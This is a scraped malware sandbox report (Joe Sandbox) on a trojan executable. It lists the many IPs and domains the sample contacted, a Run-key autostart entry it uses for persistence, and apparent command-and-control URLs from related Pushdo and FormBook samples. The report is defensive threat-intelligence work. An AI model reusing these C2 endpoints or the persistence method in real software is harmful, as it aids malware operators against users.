00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/elektricni-pribor-za-merilnike-tlaka/PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                    185.205.70.128
                                                                                                                                                                                                                                                    mail.protonmail.chunknown
                                                                                                                                                                                                                                                    205822DEVINOTELECOM-ASRUtrue
                                                                                                                                                                                                                                                    103.224.212.221
                                                                                                                                                                                                                                                    www.railbook.netAustralia
                                                                                                                                                                                                                                                    133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                                                                                                                                                                                                    217.69.139.150
                                                                                                                                                                                                                                                    mxs.mail.ruRussian Federation
                                                                                                                                                                                                                                                    47764MAILRU-ASMailRuRUfalse
                                                                                                                                                                                                                                                    67.21.93.229
                                                                                                                                                                                                                                                    num6.17986.netUnited States
                                                                                                                                                                                                                                                    46844ST-BGPUStrue
                                                                                                                                                                                                                                                    170.82.173.30
                                                                                                                                                                                                                                                    www.mqs.com.br.cdn.gocache.netBrazil
                                                                                                                                                                                                                                                    2664443LCLOUDINTERNETSERVICESLTDA-EPPBRfalse
                                                                                                                                                                                                                                                    96.91.204.114
                                                                                                                                                                                                                                                    www.wnsavoy.comUnited States
                                                                                                                                                                                                                                                    7922COMCAST-7922USfalse
                                                                                                                                                                                                                                                    80.211.41.39
                                                                                                                                                                                                                                                    tabbles.netItaly
                                                                                                                                                                                                                                                    31034ARUBA-ASNITtrue
                                                                                                                                                                                                                                                    104.20.55.214
                                                                                                                                                                                                                                                    bible.orgUnited States
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    59.106.19.204
                                                                                                                                                                                                                                                    baijaku.comJapan9370SAKURA-BSAKURAInternetIncJPfalse
                                                                                                                                                                                                                                                    3.130.204.160
                                                                                                                                                                                                                                                    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comUnited States
                                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                                    198.49.23.144
                                                                                                                                                                                                                                                    midap.comUnited States
                                                                                                                                                                                                                                                    53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                    62.122.190.121
                                                                                                                                                                                                                                                    www.credo.edu.plunknown
                                                                                                                                                                                                                                                    49120GORSET-ASRUfalse
                                                                                                                                                                                                                                                    83.223.113.46
                                                                                                                                                                                                                                                    dataform.co.ukUnited Kingdom
                                                                                                                                                                                                                                                    29017GYRONGBtrue
                                                                                                                                                                                                                                                    91.229.22.126
                                                                                                                                                                                                                                                    pleszew.policja.gov.plPoland
                                                                                                                                                                                                                                                    198704CSD-KGP-PL-ASBiuroLacznosciiInformatykiPLtrue
                                                                                                                                                                                                                                                    54.212.145.129
                                                                                                                                                                                                                                                    nolaoig.orgUnited States
                                                                                                                                                                                                                                                    16509AMAZON-02UStrue
                                                                                                                                                                                                                                                    83.167.255.150
                                                                                                                                                                                                                                                    dzm.czCzech Republic
                                                                                                                                                                                                                                                    24971MASTER-ASCzechRepublicwwwmasterczCZtrue
                                                                                                                                                                                                                                                    66.226.70.66
                                                                                                                                                                                                                                                    mail.airmail.netUnited States
                                                                                                                                                                                                                                                    30447INFB2-ASUSfalse
                                                                                                                                                                                                                                                    35.154.163.204
                                                                                                                                                                                                                                                    apcotex.comUnited States
                                                                                                                                                                                                                                                    16509AMAZON-02UStrue
                                                                                                                                                                                                                                                    34.205.242.146
                                                                                                                                                                                                                                                    hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                                                    14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                    13.248.169.48
                                                                                                                                                                                                                                                    www.findbc.comUnited States
                                                                                                                                                                                                                                                    16509AMAZON-02UStrue
                                                                                                                                                                                                                                                    172.67.146.154
                                                                                                                                                                                                                                                    simetar.comUnited States
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                    87.248.97.31
                                                                                                                                                                                                                                                    smtp.aol.g03.yahoodns.netUnited Kingdom
                                                                                                                                                                                                                                                    34010YAHOO-IRDGBtrue
                                                                                                                                                                                                                                                    173.205.126.33
                                                                                                                                                                                                                                                    cbaben.comUnited States
                                                                                                                                                                                                                                                    54641INMOTI-1UStrue
                                                                                                                                                                                                                                                    208.109.214.162
                                                                                                                                                                                                                                                    pwd.orgUnited States
                                                                                                                                                                                                                                                    26496AS-26496-GO-DADDY-COM-LLCUSfalse
                                                                                                                                                                                                                                                    85.128.196.22
                                                                                                                                                                                                                                                    strazynski.plPoland
                                                                                                                                                                                                                                                    15967NAZWAPLtrue
                                                                                                                                                                                                                                                    18.119.154.66
                                                                                                                                                                                                                                                    hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comUnited States
                                                                                                                                                                                                                                                    3MIT-GATEWAYSUStrue
                                                                                                                                                                                                                                                    87.248.97.36
                                                                                                                                                                                                                                                    smtp.mail.global.gm0.yahoodns.netUnited Kingdom
                                                                                                                                                                                                                                                    34010YAHOO-IRDGBtrue
                                                                                                                                                                                                                                                    185.15.129.58
                                                                                                                                                                                                                                                    unknownFrance
                                                                                                                                                                                                                                                    30889WAYCOM-ASWaycomInternational-EuropeanNetworkFRfalse
                                                                                                                                                                                                                                                    202.254.236.40
                                                                                                                                                                                                                                                    www.naoi-a.comJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                                                                                                                                                                                                                                    157.7.107.38
                                                                                                                                                                                                                                                    aoinko.netJapan7506INTERQGMOInternetIncJPtrue
                                                                                                                                                                                                                                                    173.254.28.29
                                                                                                                                                                                                                                                    pb-games.comUnited States
                                                                                                                                                                                                                                                    46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                                                                                                    188.165.133.163
                                                                                                                                                                                                                                                    xaicom.esFrance
                                                                                                                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                                                                                                                    81.2.194.241
                                                                                                                                                                                                                                                    www.edimart.huCzech Republic
                                                                                                                                                                                                                                                    24806INTERNET-CZKtis238403KtisCZfalse
                                                                                                                                                                                                                                                    104.21.55.224
                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    72.44.93.236
                                                                                                                                                                                                                                                    maktraxx.comUnited States
                                                                                                                                                                                                                                                    36444NEXCESS-NETUSfalse
                                                                                                                                                                                                                                                    147.154.0.23
                                                                                                                                                                                                                                                    hibu34.inregion.waas.oci.oraclecloud.netUnited States
                                                                                                                                                                                                                                                    31898ORACLE-BMC-31898USfalse
                                                                                                                                                                                                                                                    35.186.238.101
                                                                                                                                                                                                                                                    onzcda.comUnited States
                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    74.208.215.145
                                                                                                                                                                                                                                                    indonesiamedia.comUnited States
                                                                                                                                                                                                                                                    8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                                                                                                    104.26.10.81
                                                                                                                                                                                                                                                    www.com-sit.comUnited States
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    69.163.218.51
                                                                                                                                                                                                                                                    www.fink.comUnited States
                                                                                                                                                                                                                                                    26347DREAMHOST-ASUSfalse
                                                                                                                                                                                                                                                    104.21.23.9
                                                                                                                                                                                                                                                    www.jenco.co.ukUnited States
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    104.196.26.65
                                                                                                                                                                                                                                                    www.cel-cpa.comUnited States
                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    49.212.235.175
                                                                                                                                                                                                                                                    nts-web.netJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                    77.78.104.3
                                                                                                                                                                                                                                                    zupraha.czCzech Republic
                                                                                                                                                                                                                                                    15685CASABLANCA-ASInternetCollocationProviderCZtrue
                                                                                                                                                                                                                                                    49.212.180.178
                                                                                                                                                                                                                                                    kumaden.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                    195.78.66.50
                                                                                                                                                                                                                                                    www.photo4b.comPoland
                                                                                                                                                                                                                                                    41079SUPERHOST-PL-ASPLfalse
                                                                                                                                                                                                                                                    193.70.68.254
                                                                                                                                                                                                                                                    www.valselit.comFrance
                                                                                                                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                                                                                                                    15.197.142.173
                                                                                                                                                                                                                                                    cjborden.comUnited States
                                                                                                                                                                                                                                                    7430TANDEMUStrue
                                                                                                                                                                                                                                                    77.72.4.226
                                                                                                                                                                                                                                                    pellys.co.ukUnited Kingdom
                                                                                                                                                                                                                                                    12488KRYSTALGRtrue
                                                                                                                                                                                                                                                    137.118.26.67
                                                                                                                                                                                                                                                    fnw.usUnited States
                                                                                                                                                                                                                                                    6250NEONOVA-NETUSfalse
                                                                                                                                                                                                                                                    23.227.38.74
                                                                                                                                                                                                                                                    shops.myshopify.comCanada
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    204.15.134.44
                                                                                                                                                                                                                                                    esmoke.netUnited States
                                                                                                                                                                                                                                                    33322NDCHOSTUStrue
                                                                                                                                                                                                                                                    157.7.107.49
                                                                                                                                                                                                                                                    wantapc.netJapan7506INTERQGMOInternetIncJPtrue
                                                                                                                                                                                                                                                    188.166.152.188
                                                                                                                                                                                                                                                    www.c9dd.comNetherlands
                                                                                                                                                                                                                                                    14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                    185.253.212.22
                                                                                                                                                                                                                                                    karmy.com.plPoland
                                                                                                                                                                                                                                                    48707GREENER-ASPLtrue
                                                                                                                                                                                                                                                    104.143.9.110
                                                                                                                                                                                                                                                    www.x0c.comUnited States
                                                                                                                                                                                                                                                    64200VIVIDHOSTINGUSfalse
                                                                                                                                                                                                                                                    210.140.73.39
                                                                                                                                                                                                                                                    at-shun.comJapan4694IDCFIDCFrontierIncJPfalse
                                                                                                                                                                                                                                                    70.39.251.249
                                                                                                                                                                                                                                                    quadlock.comUnited States
                                                                                                                                                                                                                                                    54641INMOTI-1USfalse
                                                                                                                                                                                                                                                    104.26.7.221
                                                                                                                                                                                                                                                    www.valdal.comUnited States
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    5.134.13.210
                                                                                                                                                                                                                                                    nels.co.ukUnited Kingdom
                                                                                                                                                                                                                                                    34282UKNOC-ASGBtrue
                                                                                                                                                                                                                                                    62.75.216.137
                                                                                                                                                                                                                                                    www.tyrns.comGermany
                                                                                                                                                                                                                                                    8972GD-EMEA-DC-SXB1DEfalse
                                                                                                                                                                                                                                                    46.242.238.60
                                                                                                                                                                                                                                                    waldi.plPoland
                                                                                                                                                                                                                                                    12824HOMEPL-ASPLfalse
                                                                                                                                                                                                                                                    52.19.230.145
                                                                                                                                                                                                                                                    hes.ptUnited States
                                                                                                                                                                                                                                                    16509AMAZON-02UStrue
                                                                                                                                                                                                                                                    62.122.170.171
                                                                                                                                                                                                                                                    shztm.ruCzech Republic
                                                                                                                                                                                                                                                    50245SERVEREL-ASNLtrue
                                                                                                                                                                                                                                                    72.251.233.245
                                                                                                                                                                                                                                                    www.koz1.netUnited States
                                                                                                                                                                                                                                                    29791VOXEL-DOT-NETUSfalse
                                                                                                                                                                                                                                                    172.67.156.49
                                                                                                                                                                                                                                                    orlyhotel.comUnited States
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                    104.21.88.198
                                                                                                                                                                                                                                                    www.tvtools.fiUnited States
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    13.224.103.91
                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                                    18.165.183.69
                                                                                                                                                                                                                                                    d2r2uj0bnofxxz.cloudfront.netUnited States
                                                                                                                                                                                                                                                    3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                    162.43.120.128
                                                                                                                                                                                                                                                    www.stajum.comUnited States
                                                                                                                                                                                                                                                    11333CYBERTRAILSUSfalse
                                                                                                                                                                                                                                                    208.100.26.245
                                                                                                                                                                                                                                                    atb-lit.comUnited States
                                                                                                                                                                                                                                                    32748STEADFASTUStrue
                                                                                                                                                                                                                                                    142.250.27.27
                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    142.250.27.26
                                                                                                                                                                                                                                                    gmail-smtp-in.l.google.comUnited States
                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    34.117.168.233
                                                                                                                                                                                                                                                    td-ccm-168-233.wixdns.netUnited States
                                                                                                                                                                                                                                                    139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                                    82.201.61.230
                                                                                                                                                                                                                                                    www.nelipak.nlNetherlands
                                                                                                                                                                                                                                                    15879KPN-INTERNEDSERVICESNLfalse
                                                                                                                                                                                                                                                    208.97.178.138
                                                                                                                                                                                                                                                    www.jchysk.comUnited States
                                                                                                                                                                                                                                                    26347DREAMHOST-ASUSfalse
                                                                                                                                                                                                                                                    156.251.140.23
                                                                                                                                                                                                                                                    likangds.comSeychelles
                                                                                                                                                                                                                                                    40065CNSERVERSUStrue
                                                                                                                                                                                                                                                    79.124.76.247
                                                                                                                                                                                                                                                    mkm-gr.comBulgaria
                                                                                                                                                                                                                                                    31083TELEPOINTBGtrue
                                                                                                                                                                                                                                                    46.4.56.54
                                                                                                                                                                                                                                                    wolffkran.deGermany
                                                                                                                                                                                                                                                    24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                                    188.114.96.7
                                                                                                                                                                                                                                                    webways.comEuropean Union
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                    185.80.51.179
                                                                                                                                                                                                                                                    hummer.huHungary
                                                                                                                                                                                                                                                    62214RACKFOREST-ASHUfalse
                                                                                                                                                                                                                                                    172.67.68.180
                                                                                                                                                                                                                                                    canasil.comUnited States
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                    5.181.161.11
                                                                                                                                                                                                                                                    plaske.uaMoldova Republic of
                                                                                                                                                                                                                                                    39144ARAGON-ASEStrue
                                                                                                                                                                                                                                                    193.166.255.171
                                                                                                                                                                                                                                                    synetik.netFinland
                                                                                                                                                                                                                                                    1741FUNETASFIfalse
                                                                                                                                                                                                                                                    69.89.107.122
                                                                                                                                                                                                                                                    willsub.comUnited States
                                                                                                                                                                                                                                                    14103ACDNET-ASN1USfalse
                                                                                                                                                                                                                                                    192.241.158.94
                                                                                                                                                                                                                                                    nunomira.comUnited States
                                                                                                                                                                                                                                                    14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                    96.127.180.42
                                                                                                                                                                                                                                                    www.jacomfg.comUnited States
                                                                                                                                                                                                                                                    32475SINGLEHOP-LLCUSfalse
                                                                                                                                                                                                                                                    118.27.125.181
                                                                                                                                                                                                                                                    www.pr-park.comJapan7506INTERQGMOInternetIncJPfalse
                                                                                                                                                                                                                                                    212.44.102.57
                                                                                                                                                                                                                                                    oozkranj.comSlovenia
                                                                                                                                                                                                                                                    43128DHH-ASSItrue
                                                                                                                                                                                                                                                    172.217.16.179
                                                                                                                                                                                                                                                    ghs.googlehosted.comUnited States
                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    122.128.109.107
                                                                                                                                                                                                                                                    www.vitaindu.comHong Kong
                                                                                                                                                                                                                                                    133380LAYER-ASLayerstackLimitedHKfalse
                                                                                                                                                                                                                                                    164.132.175.106
                                                                                                                                                                                                                                                    zemarmot.netFrance
                                                                                                                                                                                                                                                    16276OVHFRtrue
                                                                                                                                                                                                                                                    192.124.249.14
                                                                                                                                                                                                                                                    isom.orgUnited States
                                                                                                                                                                                                                                                    30148SUCURI-SECUStrue
                                                                                                                                                                                                                                                    142.250.157.26
                                                                                                                                                                                                                                                    alt4.gmail-smtp-in.l.google.comUnited States
                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    192.124.249.10
                                                                                                                                                                                                                                                    evcpa.comUnited States
                                                                                                                                                                                                                                                    30148SUCURI-SECUSfalse
                                                                                                                                                                                                                                                    165.227.252.190
                                                                                                                                                                                                                                                    crcsi.orgUnited States
                                                                                                                                                                                                                                                    14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                    46.8.8.200
                                                                                                                                                                                                                                                    ludea.czRussian Federation
                                                                                                                                                                                                                                                    60592GRANSYGransysrohttpgransycomCZtrue
                                                                                                                                                                                                                                                    198.185.159.144
                                                                                                                                                                                                                                                    captlfix.comUnited States
                                                                                                                                                                                                                                                    53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                    103.168.172.220
                                                                                                                                                                                                                                                    in1.smtp.messagingengine.comunknown
                                                                                                                                                                                                                                                    7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                                                    192.168.2.1
                                                                                                                                                                                                                                                    Joe Sandbox Version:38.0.0 Beryl
                                                                                                                                                                                                                                                    Analysis ID:1281447
                                                                                                                                                                                                                                                    Start date and time:2023-07-27 21:41:38 +02:00
                                                                                                                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                                                                    Overall analysis duration:0h 11m 54s
                                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                                                                    Number of analysed new started processes analysed:13
                                                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                                    • HDC enabled
                                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                                    Sample file name:PIyT9A3jfC.exe
                                                                                                                                                                                                                                                    (renamed file extension from none to exe, renamed because original name is a hash value)
                                                                                                                                                                                                                                                    Original Sample Name:db47df7cf51747e533c968da7452f1ce6d20f465d7fcd6e2eac559266ac3e9ed
                                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                                    Classification:mal100.spre.troj.evad.winEXE@19/4@967/100
                                                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                                    HDC Information:
                                                                                                                                                                                                                                                    • Successful, ratio: 92.9% (good quality ratio 83.8%)
                                                                                                                                                                                                                                                    • Quality average: 72.3%
                                                                                                                                                                                                                                                    • Quality standard deviation: 32.5%
                                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                                    • Number of executed functions: 42
                                                                                                                                                                                                                                                    • Number of non-executed functions: 82
                                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): audiodg.exe, WMIADAP.exe
                                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 104.21.63.28, 172.67.142.169, 204.79.197.212
                                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): www.ottospm.com.cdn.cloudflare.net, ctldl.windowsupdate.com, a-0010.a-msedge.net
                                                                                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                                                    21:42:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                    21:43:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                    21:43:47API Interceptor2x Sleep call for process: PIyT9A3jfC.exe modified
                                                                                                                                                                                                                                                    21:44:18API Interceptor2x Sleep call for process: pigalicapi.exe modified
                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    185.205.70.1281EsDtA4mep.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                        h9Gwq0fYVO.exeGet hashmaliciousPushdo, SmokeLoaderBrowse
                                                                                                                                                                                                                                                          0fmEh2zmDj.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                            TLURH6Og6c.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                              103.224.212.221SecuriteInfo.com.Trojan.Click2.5579.8673.8913.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • www.gus168.com/index.php?apv=pvst&func=home
                                                                                                                                                                                                                                                              E-dekont.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                              • www.motivacaodossonhos.com/be85/?3fcX=h0GHc&1b=vMMwZZzZzOQZNBW1HmyY8+q3PszqAGDUE5SK73u9sGAGs18EvSuc4qCaKSXYP9pPkkls
                                                                                                                                                                                                                                                              http://ww25.graphsproject.com/api/v1/cmps?subid1=20230322-1123-00ff-8157-5596a5b2d5ccGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • graphsproject.com/
                                                                                                                                                                                                                                                              ZiraatEkstre_20230215.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                              • www.connoisseuroflife.com/gg84/?mzrDU0=D93LDLgH+VaSToeMyByzzqrTpPF6ewpTzihjU/f3t3ehgO3gWZ3QMuHhxeP9nVJLgFc6&2dq=9ryxGpG0MrvXjh
                                                                                                                                                                                                                                                              aZDSUPv6IlTFjIz.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                              • www.appatit.com/p25s/?WDK0=EFNPJbRxW8_XAbC&3f_=ubp/zzdxsKKkZ2Dwj7qTgxlEHoOZry7NvafEAIRaemed+w9YnFO1C3sIN8u6tNrcBEOZ
                                                                                                                                                                                                                                                              eQcKjYOV30.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                              • www.railbook.net/
                                                                                                                                                                                                                                                              0fmEh2zmDj.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                              • www.railbook.net/
                                                                                                                                                                                                                                                              shdybron2.1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                              • www.sandstormcase.us/sk29/?n0=cRkX&4hHxFhL=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msgKNN3MBcg
                                                                                                                                                                                                                                                              primosdv3.1.1.0.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                              • www.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD
                                                                                                                                                                                                                                                              nuovo ordine pdf xxxdjcS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                              • www.ffewv.com/m21d/?L2J=H8wPepZx-XIhtF4&T48Pxlx=w1zJ5h0JUZtA1gSAWeIAg9LelIEx5eSsh/nB0momuv582nOffa9lb58+p1RJzm+hwTQC
                                                                                                                                                                                                                                                              new purchase order.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                              • www.majalahlangitan.com/awqu/?8pDdGnf=ULG6cqAaDBFW+JL7hauOEWg/5rLVubmgN+mLR3PFHBry7NGOHmH+xtWLKcUUM8gnQBB2&FZ-DJ=1bwl
                                                                                                                                                                                                                                                              0098764345678.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                              • www.whipbull.com/zzun/?oDH=0v5Tjp&3fZ4-PZ=Kiv179iAIMPDqB30KPMwtVjQGuO+8qaWaLcZydmce/CQLYP70aekBaXIYi060oxX9tqE
                                                                                                                                                                                                                                                              zapytanie ofertowe09356.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                              • www.modayunpocomas.com/vweq/?n6CtjVk=b1bJK5Cx1WXy0wsf/TqKyRcIRZuicuUWKyI8lsv3lO4f+D6oknJIYD7clvGxbiAJhgLm&iX_ll=Sv9LEx
                                                                                                                                                                                                                                                              Invoice & Shipment Documents.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                              • www.carparts77.info/v4qp/?h0DL3N=68xUuQLn3aXJ4HtgUiPTd3DG+cDGs9nfhzStxVoBaxWiyaw2QFXYJYodS64mZgg8pqgM&1b=4hwh-
                                                                                                                                                                                                                                                              DHL_AWB_NO#907853880911.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                              • www.mybullion.net/s0s2/?5j=vz+QP8SLN37TKOjneZZE1cuVYKuDOMfhwJYzNrMV6hOOF3BWvlF/OgBUiPKqKx/aZVbp&yN=WH-d2B7H
